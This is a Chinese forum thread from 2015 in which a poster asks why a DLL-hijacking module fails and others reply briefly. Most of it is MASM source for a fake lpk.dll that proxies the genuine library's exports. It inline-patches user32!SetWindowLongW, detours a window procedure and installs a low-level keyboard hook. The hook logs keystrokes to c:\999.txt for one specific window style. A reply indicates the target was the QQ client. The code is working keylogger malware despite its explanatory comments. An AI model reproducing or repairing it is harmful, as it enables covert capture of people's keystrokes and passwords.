[旧帖] DLL劫持错在哪里 0.00雪花
发表于: 2015-7-6 20:23 6473

[旧帖] DLL劫持错在哪里 0.00雪花

2015-7-6 20:23
6473
.386
                .model flat, stdcall
                option casemap :none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 文件定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include                windows.inc
include                user32.inc
includelib        user32.lib
include                kernel32.inc
includelib        kernel32.lib
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
                .data
;--------------------------------------------------------------------
; Analyst notes (module built to stand in for lpk.dll, per the post
; title "DLL hijack"):
;  - szLpk is the absolute path of the genuine lpk.dll; the
;    forwarding stubs in .code resolve every export from that copy.
;  - lp* strings are export names handed to GetProcAddress by the
;    stubs; szLpkEditControl is the export whose first 0x40 bytes
;    DllEntry1 copies over the local LpkEditControl placeholder.
;  - Every other string / dword here (API names, szCx, szX, the
;    dw* slots) is not referenced by any proc in this listing.
;--------------------------------------------------------------------
hInstance        dd        ?                          ; not referenced in this listing
szLpk db 'C:\WINDOWS\system32\lpk.dll',0             ; genuine DLL to forward to
szLpkEditControl db 'LpkEditControl',0               ; export copied byte-wise by DllEntry1
lpLpkInitialize db 'LpkInitialize',0
lpLpkTabbedTextOut db 'LpkTabbedTextOut',0
lpLpkDllInitialize db 'LpkDllInitialize',0
lpLpkDrawTextEx db  'LpkDrawTextEx',0
lpLpkEditControl db 'LpkEditControl',0               ; duplicate of szLpkEditControl; unused here
lpLpkExtTextOut db 'LpkExtTextOut',0
lpLpkGetCharacterPlacement db 'LpkGetCharacterPlacement',0
lpLpkGetTextExtentExPoint db 'LpkGetTextExtentExPoint',0
lpLpkPSMTextOut db 'LpkPSMTextOut',0
lpLpkUseGDIWidthCache db 'LpkUseGDIWidthCache',0
lpftsWordBreak db 'ftsWordBreak',0
szCx db 'c:\999.txt',0                               ; fixed file path; unused in this listing
szX db '%x',0                                        ; wsprintf format; unused in this listing
szSetWindowsHookExA db 'SetWindowsHookExA',0
dwSetWindowsHookExA dd ?

lpSetWindowLongW db 'SetWindowLongW',0
dwSetWindowLongW dd ?

szLoadLibrary db 'LoadLibraryA',0
szKernel32 db 'kernel32',0

szUser32 db 'user32',0

szCreateWindowExA db 'CreateWindowExA',0

szSetWindowLongA db 'SetWindowLongW',0               ; label says ...A but the string is the W export
szGetActiveWindow db 'GetActiveWindow',0
dwGetActiveWindow dd ?

                .data?
;--------------------------------------------------------------------
; Uninitialised storage. Only dwLpk is referenced by the code in this
; listing (written by DllEntry1, read by every forwarding stub); the
; remaining slots are declared but not used here.
;--------------------------------------------------------------------
hWnd                dd        ?
hHook                dd        ?
dwMessage        dd        ?
szAscii                db        4 dup (?)
dwLpk dd ?                                           ; HMODULE of the genuine lpk.dll
hFile dd ?
dwId dd ?
szFu1 db 255 dup (?),0
dwNubla dd ?
dwProcAddress dd ?
opl1 db 9 dup (?)
lpProc dd ?
gk1 db ?
hHook1 dd ?
hWnd1                dd        ?

ppp db 5 dup (?)
ggg dd ?

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
                .code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; dll 的入口函数
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 键盘钩子回调函数
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

;--------------------------------------------------------------------
; LpkInitialize — export forwarder. On every call resolves the
; same-named export from the genuine lpk.dll (dwLpk, set in DllEntry1)
; and tail-jumps to it. The proc declares no parameters, so MASM
; emits no frame code and the caller's arguments and return address
; reach the original untouched. The GetProcAddress result is not
; checked before the jump.
;--------------------------------------------------------------------
LpkInitialize proc
invoke GetProcAddress,dwLpk,addr lpLpkInitialize     ; eax = genuine LpkInitialize
jmp eax                                              ; tail call, caller's stack intact
LpkInitialize endp

;--------------------------------------------------------------------
; LpkTabbedTextOut — export forwarder to the genuine lpk.dll (dwLpk).
; No frame is built; the resolved address is jumped to unchecked.
;--------------------------------------------------------------------
LpkTabbedTextOut proc
invoke GetProcAddress,dwLpk,addr lpLpkTabbedTextOut  ; eax = genuine export
jmp eax                                              ; tail call
LpkTabbedTextOut endp

;--------------------------------------------------------------------
; LpkDllInitialize — export forwarder to the genuine lpk.dll (dwLpk).
; No frame is built; the resolved address is jumped to unchecked.
;--------------------------------------------------------------------
LpkDllInitialize proc
invoke GetProcAddress,dwLpk,addr lpLpkDllInitialize  ; eax = genuine export
jmp eax                                              ; tail call
LpkDllInitialize endp

;--------------------------------------------------------------------
; LpkDrawTextEx — export forwarder to the genuine lpk.dll (dwLpk).
; No frame is built; the resolved address is jumped to unchecked.
;--------------------------------------------------------------------
LpkDrawTextEx proc
invoke GetProcAddress,dwLpk,addr lpLpkDrawTextEx     ; eax = genuine export
jmp eax                                              ; tail call
LpkDrawTextEx endp

;--------------------------------------------------------------------
; LpkEditControl — not code: 16 dwords (0x40 bytes) of placeholder
; living in the .code section. DllEntry1 changes this page's
; protection and copies the first 0x40 bytes of the genuine
; LpkEditControl export over it, so the export of that name points at
; data rather than at a forwarding stub. Writable data inside an
; executable section is a W^X violation worth flagging.
;--------------------------------------------------------------------
LpkEditControl proc
dd 16 dup (?)                                        ; filled at run time by DllEntry1
LpkEditControl endp

;--------------------------------------------------------------------
; LpkExtTextOut — export forwarder to the genuine lpk.dll (dwLpk).
; No frame is built; the resolved address is jumped to unchecked.
;--------------------------------------------------------------------
LpkExtTextOut proc
invoke GetProcAddress,dwLpk,addr lpLpkExtTextOut     ; eax = genuine export
jmp eax                                              ; tail call
LpkExtTextOut endp

;--------------------------------------------------------------------
; LpkGetCharacterPlacement — export forwarder to the genuine lpk.dll
; (dwLpk). No frame is built; the resolved address is jumped to
; unchecked.
;--------------------------------------------------------------------
LpkGetCharacterPlacement proc

invoke GetProcAddress,dwLpk,addr lpLpkGetCharacterPlacement  ; eax = genuine export
jmp eax                                              ; tail call
LpkGetCharacterPlacement endp

;--------------------------------------------------------------------
; LpkGetTextExtentExPoint — export forwarder to the genuine lpk.dll
; (dwLpk). No frame is built; the resolved address is jumped to
; unchecked.
;--------------------------------------------------------------------
LpkGetTextExtentExPoint proc

invoke GetProcAddress,dwLpk,addr lpLpkGetTextExtentExPoint   ; eax = genuine export
jmp eax                                              ; tail call
LpkGetTextExtentExPoint endp

;--------------------------------------------------------------------
; LpkPSMTextOut — export forwarder to the genuine lpk.dll (dwLpk).
; No frame is built; the resolved address is jumped to unchecked.
;--------------------------------------------------------------------
LpkPSMTextOut proc

invoke GetProcAddress,dwLpk,addr lpLpkPSMTextOut     ; eax = genuine export
jmp eax                                              ; tail call
LpkPSMTextOut endp

;--------------------------------------------------------------------
; LpkUseGDIWidthCache — export forwarder to the genuine lpk.dll
; (dwLpk). No frame is built; the resolved address is jumped to
; unchecked.
;--------------------------------------------------------------------
LpkUseGDIWidthCache proc

invoke GetProcAddress,dwLpk,addr lpLpkUseGDIWidthCache       ; eax = genuine export
jmp eax                                              ; tail call
LpkUseGDIWidthCache endp

;--------------------------------------------------------------------
; ftsWordBreak — export forwarder to the genuine lpk.dll (dwLpk).
; No frame is built; the resolved address is jumped to unchecked.
;--------------------------------------------------------------------
ftsWordBreak proc
invoke GetProcAddress,dwLpk,addr lpftsWordBreak      ; eax = genuine export
jmp eax                                              ; tail call
ftsWordBreak endp

;--------------------------------------------------------------------
; BOOL DllEntry1(HINSTANCE, DWORD dwReason, LPVOID)  — DllMain.
; _dwReason is never tested, so the body runs on every notification.
; Steps: make the page holding the LpkEditControl placeholder
; writable, load the genuine lpk.dll by absolute path, and copy the
; first 0x40 bytes of its LpkEditControl export over the placeholder.
; Always returns TRUE. Loading a DLL and resolving exports from inside
; DllMain is subject to the loader-lock caveats in Microsoft's DllMain
; guidance (review note, not verifiable from this listing).
;--------------------------------------------------------------------
DllEntry1        proc _hInstance,_dwReason,_dwReserved
pushad                                               ; preserve all GPRs across the body

mov ecx,40h                                          ; 0x40 = size of the placeholder
push ecx                                             ; scratch dword; esp -> lpflOldProtect
invoke VirtualProtect,addr LpkEditControl,ecx,PAGE_READWRITE,esp   ; re-protect own .code page
pop ecx                                              ; discard the old-protection value
invoke LoadLibrary,addr szLpk                        ; genuine C:\WINDOWS\system32\lpk.dll
mov dwLpk,eax                                        ; handle used by every forwarder (unchecked)
invoke GetProcAddress,dwLpk,addr szLpkEditControl
mov esi,eax                                          ; esi = genuine LpkEditControl (source)
lea edi,LpkEditControl                               ; edi = local placeholder (destination)
mov ecx,40h
rep movsb                                            ; copy 0x40 bytes over the placeholder
popad
or        eax,1                                      ; force a non-zero (TRUE) return
ret
DllEntry1        Endp

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
End        DllEntry1


最新回复 (7)
帮顶。。
2015-7-11 22:13
看不出来
2015-7-14 17:03
水平未够,不知错在哪里。
2015-7-14 17:36
同2楼。。。。。。
2015-7-17 00:46
HOOK QQ时他掉线了
2015-7-18 00:32
.386
                .model flat, stdcall
                option casemap :none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 文件定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include                windows.inc
include                user32.inc
includelib        user32.lib
include                kernel32.inc
includelib        kernel32.lib
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

;--------------------------------------------------------------------
; kbdllhook — local mirror of the Win32 KBDLLHOOKSTRUCT layout (five
; DWORDs). _HookProc overlays it on the lParam of the WH_KEYBOARD_LL
; callback to read vkCode and flags. The trailing ';' on each field
; line only starts an (empty) comment.
;--------------------------------------------------------------------
kbdllhook struct
vkCode DWORD ?;                                      ; virtual-key code
scanCode  DWORD ?;                                   ; hardware scan code
flags DWORD ?;                                       ; LLKHF_* bits
time DWORD ?;                                        ; message time stamp
dwExtraInfo DWORD ?;                                 ; extra info
kbdllhook ends

                .data
;--------------------------------------------------------------------
; Analyst notes (module built to stand in for lpk.dll, per the post
; title "DLL hijack"):
;  - szLpk: absolute path of the genuine lpk.dll the forwarders
;    resolve their exports from; szLpkEditControl is the export copied
;    byte-wise by DllEntry1.
;  - szUser32 / szSetWindowLongA / dwUser32 / dwSetWindowLongW: used by
;    DllEntry1 to locate and inline-patch user32!SetWindowLongW.
;  - szCx and szX: log-file path and '%c' format used by _HookProc
;    (keystroke logging).
;  - Everything else here is declared but not referenced by any proc
;    in this listing (szY only appears in a commented-out line).
;--------------------------------------------------------------------
hInstance        dd        ?                          ; not referenced in this listing
szLpk db 'C:\WINDOWS\system32\lpk.dll',0             ; genuine DLL to forward to
szLpkEditControl db 'LpkEditControl',0               ; export copied byte-wise by DllEntry1
lpLpkInitialize db 'LpkInitialize',0
lpLpkTabbedTextOut db 'LpkTabbedTextOut',0
lpLpkDllInitialize db 'LpkDllInitialize',0
lpLpkDrawTextEx db  'LpkDrawTextEx',0
lpLpkEditControl db 'LpkEditControl',0               ; duplicate of szLpkEditControl; unused here
lpLpkExtTextOut db 'LpkExtTextOut',0
lpLpkGetCharacterPlacement db 'LpkGetCharacterPlacement',0
lpLpkGetTextExtentExPoint db 'LpkGetTextExtentExPoint',0
lpLpkPSMTextOut db 'LpkPSMTextOut',0
lpLpkUseGDIWidthCache db 'LpkUseGDIWidthCache',0
lpftsWordBreak db 'ftsWordBreak',0
szCx db 'c:\999.txt',0                               ; keystroke log file written by _HookProc
szX db '%c',0                                        ; wsprintf format applied to vkCode
szY db '%x',0                                        ; only used in a commented-out debug line
szSetWindowsHookExA db 'SetWindowsHookExA',0
dwSetWindowsHookExA dd ?

lpSetWindowLongW db 'SetWindowLongW',0
dwSetWindowLongW dd ?                                ; address of user32!SetWindowLongW (DllEntry1)

szLoadLibrary db 'LoadLibraryA',0
szKernel32 db 'kernel32',0

szUser32 db 'user32',0
dwUser32 dd ?                                        ; HMODULE of user32 (DllEntry1)
szCreateWindowExA db 'CreateWindowExA',0

szSetWindowLongA db 'SetWindowLongW',0               ; label says ...A but the string is the W export
szGetActiveWindow db 'GetActiveWindow',0
dwGetActiveWindow dd ?
dwkeybd_event db 'keybd_event',0
szSetWindowsHookExW db 'SetWindowsHookExW',0
szSetTimer db 'SetTimer',0

                .data?
;--------------------------------------------------------------------
; Uninitialised storage. Slots referenced by the code in this listing:
; hHook (hook handle), dwLpk (genuine lpk.dll), hFile (log handle),
; szFu1 (format buffer), n1 (bytes written), y1 (window procedure
; being detoured), dwStimer (timer id). The rest are unused here.
;--------------------------------------------------------------------
hWnd                dd        ?
hHook                dd        ?                      ; WH_KEYBOARD_LL hook from _SetTimer
dwMessage        dd        ?
szAscii                db        4 dup (?)
dwLpk dd ?                                           ; HMODULE of the genuine lpk.dll
hFile dd ?                                           ; handle to c:\999.txt, opened once
dwId dd ?
szFu1 db 255 dup (?),0                               ; wsprintf output buffer
dwNubla dd ?
dwProcAddress dd ?
hEvent dd ?
lpProc dd ?
lpProc1 dd ?
hHook1 dd ?
dwEvent1 dd ?

ppp db 5 dup (?)
ggg dd ?
dwProcLong dd ?
dwMk1 db 6 dup (?)
kl1 dd ?
hEvent1 dd ?
hHook2 dd ?
dwStimer dd ?                                        ; SetTimer id; non-zero once the timer exists
v1 dd ?
n1 dd ?                                              ; lpNumberOfBytesWritten for WriteFile
y1 dd ?                                              ; address of the window procedure patched by _SetWindowLongW
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
                .code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; dll 的入口函数
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 键盘钩子回调函数
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

;--------------------------------------------------------------------
; LRESULT _HookProc(int nCode, WPARAM wParam, LPARAM lParam)
; WH_KEYBOARD_LL callback installed by _SetTimer. For HC_ACTION with
; wParam == 100h (WM_KEYDOWN) and flags not 10h / 90h (LLKHF_INJECTED,
; with or without LLKHF_UP), and only while the active window's
; GWL_STYLE equals the hard-coded 14c00020h, it formats the
; virtual-key code with '%c' and writes it to c:\999.txt (opened once,
; handle cached in hFile). It then unhooks hHook and returns 0.
; Analyst note: this is keystroke capture; the observable artefacts
; are a WH_KEYBOARD_LL hook owned by this module and writes to the
; fixed path in szCx.
;--------------------------------------------------------------------
_HookProc        proc        _dwCode,_wParam,_lParam
                local        @szKeyState[256]:byte  ; declared, never used
.if _dwCode == HC_ACTION                             ; only real key events
mov eax,_lParam                                      ; eax -> KBDLLHOOKSTRUCT
mov ecx,[eax+10h]                                    ; ecx = dwExtraInfo; not used afterwards
mov ebx,_lParam                                      ; ebx -> same struct, typed below
assume ebx:ptr kbdllhook
.if _wParam ==100h && [ebx].flags !=10h  && [ebx].flags!=90h   ; WM_KEYDOWN, not injected
invoke GetActiveWindow
invoke GetWindowLongW,eax,GWL_STYLE                  ; style of the active window
.if eax ==14c00020h                                  ; hard-coded style filter (meaning not derivable here)
.if !hFile
invoke CreateFile,addr szCx,GENERIC_WRITE or GENERIC_READ  ,FILE_SHARE_DELETE or FILE_SHARE_READ or FILE_SHARE_WRITE,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0   ; create/overwrite the log once
mov hFile,eax
.endif

invoke wsprintf,addr szFu1,addr szX,[ebx].vkCode     ; szFu1 = vkCode as one character
invoke lstrlen,addr szFu1
invoke WriteFile,hFile,addr szFu1,eax,addr n1,0      ; append to the log file
;invoke GetLastError
;invoke wsprintf,addr szFu1,addr szX,eax

.endif

.endif
.endif

invoke        UnhookWindowsHookEx,hHook              ; remove the hook handle stored by _SetTimer
xor        eax,eax                                   ; return 0
ret
_HookProc        endp

;--------------------------------------------------------------------
; _SetTimer — used as the TIMERPROC of the 100 ms timer created in
; _SetWindowLongW. Installs a WH_KEYBOARD_LL hook with _HookProc as
; the callback and the host module (GetModuleHandle(0)) as hMod,
; storing the handle in hHook. Declares no parameters, so no frame
; is built for the TIMERPROC arguments.
;--------------------------------------------------------------------
_SetTimer proc
invoke GetModuleHandle,0                             ; eax = host executable's HMODULE
invoke SetWindowsHookExW,WH_KEYBOARD_LL,addr _HookProc,eax,0
mov hHook,eax                                        ; consumed by _HookProc's UnhookWindowsHookEx
ret
_SetTimer endp

;--------------------------------------------------------------------
; _dwProcLong — detour for the window procedure whose address is in
; y1. The first 6 bytes (xca) are a slot that _SetWindowLongW fills
; with the 6 original bytes of that procedure, so control entering
; here runs them first, then the body, then resumes at y1+6.
; Body: saves all GPRs, intercepts WM_TIMER and calls
; KillTimer(hwnd, idEvent); WM_KEYDOWN (100h) is matched but no action
; is taken. The [ebp+...] reads assume the copied bytes established a
; standard frame (ebp+8 = hwnd, +0ch = msg, +10h = wParam) — an
; assumption about the patched procedure's prologue, not verifiable
; from this listing.
;--------------------------------------------------------------------
_dwProcLong proc
xca db 6 dup (?)                                     ; slot for the displaced original bytes
pushad

mov eax,[ebp+0ch]                                    ; eax = message (assuming a standard frame)

.if eax ==100h                                       ; WM_KEYDOWN: nothing done

.elseif eax ==WM_TIMER

invoke KillTimer,DWORD ptr [ebp+08h],DWORD ptr [ebp+10h]   ; KillTimer(hwnd, idEvent)

.endif

popad
mov eax,y1
add eax,6                                            ; skip the 6 patched bytes of the original
jmp eax                                              ; resume the original window procedure
_dwProcLong endp

;--------------------------------------------------------------------
; _SetWindowLongW — inline-hook body for user32!SetWindowLongW.
; DllEntry1 overwrites the first 5 bytes of SetWindowLongW with a
; rel32 jmp here and copies the displaced 5 bytes into k1, so entry
; executes them first, then this body; the final `jmp eax` resumes at
; SetWindowLongW+5 with registers restored by popad.
; Body: when the window has style 14c00020h and nIndex == -4
; (GWL_WNDPROC), takes the larger of the active window's current
; WNDPROC and the new value into y1, starts a 100 ms timer whose
; TIMERPROC is _SetTimer (once, tracked by dwStimer), makes 10 bytes
; at y1 writable and, if not already patched, saves 6 bytes of that
; procedure into xca and writes an E9 rel32 jmp to _dwProcLong.
; The [ebp+...] reads assume the copied prologue bytes set up ebp as
; a frame pointer — not verifiable from this listing.
;--------------------------------------------------------------------
_SetWindowLongW proc
k1 db 5 dup (?)                                      ; slot for SetWindowLongW's displaced 5 bytes
mov eax,dwSetWindowLongW
add eax,5                                            ; eax = resume address in the original
pushad
invoke GetWindowLongW,DWORD ptr [ebp+8],GWL_STYLE    ; style of the hwnd argument
.if eax ==14c00020h && DWORD ptr [ebp+0ch]== -4      ; target style and nIndex == GWL_WNDPROC
invoke GetActiveWindow
invoke GetWindowLongW,eax,GWL_WNDPROC                ; current procedure of the active window
.if eax
.if eax <[ebp+10h]                                   ; compare with the new WNDPROC value
mov eax,[ebp+10h]
.endif
mov y1,eax                                           ; y1 = procedure to detour

;invoke wsprintf,addr szFu1,addr szY,y1;y1
;invoke SendMessage,2623474,WM_SETTEXT,0,addr szFu1

.if !dwStimer
invoke SetTimer,0,0,100,addr _SetTimer               ; 100 ms timer; callback installs the keyboard hook
mov dwStimer,eax
.endif

mov eax,y1
push ecx                                             ; scratch dword; esp -> lpflOldProtect
invoke VirtualProtect,eax,10,PAGE_READWRITE,esp      ; make the procedure's first bytes writable
pop ecx

mov eax,y1
.if BYTE ptr [eax] !=0e9h                            ; patch only if no jmp is present yet

mov esi,eax
lea edi,xca                                          ; save the displaced bytes into _dwProcLong's slot
mov ecx,6
rep movsb

lea ecx,_dwProcLong
sub ecx,eax
sub ecx,5                                            ; rel32 = target - (patch site + 5)
mov BYTE ptr [eax],0e9h                              ; jmp rel32
mov [eax+1],ecx

.endif

.endif

.endif
popad
jmp eax                                              ; continue in the original at +5

_SetWindowLongW endp

;--------------------------------------------------------------------
; LpkInitialize — export forwarder. On every call resolves the
; same-named export from the genuine lpk.dll (dwLpk, set in DllEntry1)
; and tail-jumps to it. The proc declares no parameters, so MASM
; emits no frame code and the caller's arguments and return address
; reach the original untouched. The GetProcAddress result is not
; checked before the jump.
;--------------------------------------------------------------------
LpkInitialize proc
invoke GetProcAddress,dwLpk,addr lpLpkInitialize     ; eax = genuine LpkInitialize
jmp eax                                              ; tail call, caller's stack intact
LpkInitialize endp

;--------------------------------------------------------------------
; LpkTabbedTextOut — export forwarder to the genuine lpk.dll (dwLpk).
; No frame is built; the resolved address is jumped to unchecked.
;--------------------------------------------------------------------
LpkTabbedTextOut proc
invoke GetProcAddress,dwLpk,addr lpLpkTabbedTextOut  ; eax = genuine export
jmp eax                                              ; tail call
LpkTabbedTextOut endp

;--------------------------------------------------------------------
; LpkDllInitialize — export forwarder to the genuine lpk.dll (dwLpk).
; No frame is built; the resolved address is jumped to unchecked.
;--------------------------------------------------------------------
LpkDllInitialize proc
invoke GetProcAddress,dwLpk,addr lpLpkDllInitialize  ; eax = genuine export
jmp eax                                              ; tail call
LpkDllInitialize endp

;--------------------------------------------------------------------
; LpkDrawTextEx — export forwarder to the genuine lpk.dll (dwLpk).
; No frame is built; the resolved address is jumped to unchecked.
;--------------------------------------------------------------------
LpkDrawTextEx proc
invoke GetProcAddress,dwLpk,addr lpLpkDrawTextEx     ; eax = genuine export
jmp eax                                              ; tail call
LpkDrawTextEx endp

;--------------------------------------------------------------------
; LpkEditControl — not code: 16 dwords (0x40 bytes) of placeholder
; living in the .code section. DllEntry1 changes this page's
; protection and copies the first 0x40 bytes of the genuine
; LpkEditControl export over it, so the export of that name points at
; data rather than at a forwarding stub. Writable data inside an
; executable section is a W^X violation worth flagging.
;--------------------------------------------------------------------
LpkEditControl proc
dd 16 dup (?)                                        ; filled at run time by DllEntry1
LpkEditControl endp

;--------------------------------------------------------------------
; LpkExtTextOut — export forwarder to the genuine lpk.dll (dwLpk).
; No frame is built; the resolved address is jumped to unchecked.
;--------------------------------------------------------------------
LpkExtTextOut proc
invoke GetProcAddress,dwLpk,addr lpLpkExtTextOut     ; eax = genuine export
jmp eax                                              ; tail call
LpkExtTextOut endp

;--------------------------------------------------------------------
; LpkGetCharacterPlacement — export forwarder to the genuine lpk.dll
; (dwLpk). No frame is built; the resolved address is jumped to
; unchecked.
;--------------------------------------------------------------------
LpkGetCharacterPlacement proc

invoke GetProcAddress,dwLpk,addr lpLpkGetCharacterPlacement  ; eax = genuine export
jmp eax                                              ; tail call
LpkGetCharacterPlacement endp

;--------------------------------------------------------------------
; LpkGetTextExtentExPoint — export forwarder to the genuine lpk.dll
; (dwLpk). No frame is built; the resolved address is jumped to
; unchecked.
;--------------------------------------------------------------------
LpkGetTextExtentExPoint proc

invoke GetProcAddress,dwLpk,addr lpLpkGetTextExtentExPoint   ; eax = genuine export
jmp eax                                              ; tail call
LpkGetTextExtentExPoint endp

;--------------------------------------------------------------------
; LpkPSMTextOut — export forwarder to the genuine lpk.dll (dwLpk).
; No frame is built; the resolved address is jumped to unchecked.
;--------------------------------------------------------------------
LpkPSMTextOut proc

invoke GetProcAddress,dwLpk,addr lpLpkPSMTextOut     ; eax = genuine export
jmp eax                                              ; tail call
LpkPSMTextOut endp

;--------------------------------------------------------------------
; LpkUseGDIWidthCache — export forwarder to the genuine lpk.dll
; (dwLpk). No frame is built; the resolved address is jumped to
; unchecked.
;--------------------------------------------------------------------
LpkUseGDIWidthCache proc

invoke GetProcAddress,dwLpk,addr lpLpkUseGDIWidthCache       ; eax = genuine export
jmp eax                                              ; tail call
LpkUseGDIWidthCache endp

;--------------------------------------------------------------------
; ftsWordBreak — export forwarder to the genuine lpk.dll (dwLpk).
; No frame is built; the resolved address is jumped to unchecked.
;--------------------------------------------------------------------
ftsWordBreak proc
invoke GetProcAddress,dwLpk,addr lpftsWordBreak      ; eax = genuine export
jmp eax                                              ; tail call
ftsWordBreak endp

;--------------------------------------------------------------------
; BOOL DllEntry1(HINSTANCE, DWORD dwReason, LPVOID)  — DllMain.
; _dwReason is never tested, so the body runs on every notification.
; Steps:
;  1. make the page holding the LpkEditControl placeholder writable,
;     load the genuine lpk.dll and copy 0x40 bytes of its
;     LpkEditControl export over the placeholder;
;  2. load user32, resolve SetWindowLongW (via the szSetWindowLongA
;     string) and make its first 10 bytes writable;
;  3. if its first byte is not already E9, make _SetWindowLongW's k1
;     slot writable, save the 5 displaced bytes there and write an
;     E9 rel32 jmp to _SetWindowLongW over SetWindowLongW;
;  4. make _dwProcLong's xca slot writable for later use.
; Always returns TRUE.
; Detection note: after this runs, user32!SetWindowLongW begins with
; a jmp into a non-user32 module — the classic inline-hook signature
; that user-mode hook scanners and .text integrity checks report.
; LoadLibrary/GetProcAddress from DllMain is subject to the
; loader-lock caveats in Microsoft's DllMain guidance (review note).
;--------------------------------------------------------------------
DllEntry1        proc _hInstance,_dwReason,_dwReserved
pushad                                               ; preserve all GPRs across the body
mov ecx,40h                                          ; 0x40 = size of the placeholder
push ecx                                             ; scratch dword; esp -> lpflOldProtect
invoke VirtualProtect,addr LpkEditControl,ecx,PAGE_READWRITE,esp   ; re-protect own .code page
pop ecx                                              ; discard the old-protection value
invoke LoadLibrary,addr szLpk                        ; genuine C:\WINDOWS\system32\lpk.dll
mov dwLpk,eax                                        ; handle used by every forwarder (unchecked)
invoke GetProcAddress,dwLpk,addr szLpkEditControl
mov esi,eax                                          ; esi = genuine LpkEditControl (source)
lea edi,LpkEditControl                               ; edi = local placeholder (destination)
mov ecx,40h
rep movsb                                            ; copy 0x40 bytes over the placeholder

invoke LoadLibrary,addr szUser32
mov dwUser32,eax
invoke GetProcAddress,dwUser32,addr szSetWindowLongA ; string is 'SetWindowLongW' despite the label
mov dwSetWindowLongW,eax                             ; patch site (unchecked)

push ecx                                             ; scratch dword; esp -> lpflOldProtect
invoke VirtualProtect,dwSetWindowLongW,10,PAGE_READWRITE,esp   ; make user32 code writable
pop ecx

mov eax,dwSetWindowLongW
.if BYTE ptr [eax]!=0e9h                             ; patch only if no jmp is present yet

push ecx
invoke VirtualProtect,_SetWindowLongW,10,PAGE_READWRITE,esp    ; make the k1 slot writable
pop ecx

mov esi,dwSetWindowLongW
lea edi,k1                                           ; save the displaced 5 bytes into the hook's slot
mov ecx,5
rep movsb

mov eax,dwSetWindowLongW
mov ecx,offset _SetWindowLongW
sub ecx,eax
sub ecx,5                                            ; rel32 = target - (patch site + 5)
mov BYTE ptr [eax],0e9h                              ; jmp rel32
mov [eax+1],ecx
.endif

push ecx
invoke VirtualProtect,_dwProcLong,10,PAGE_READWRITE,esp        ; make the xca slot writable
pop ecx

popad
or        eax,1                                      ; force a non-zero (TRUE) return
ret
DllEntry1        Endp

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
End        DllEntry1
2015-7-18 00:34
呼唤高手
2015-7-22 08:11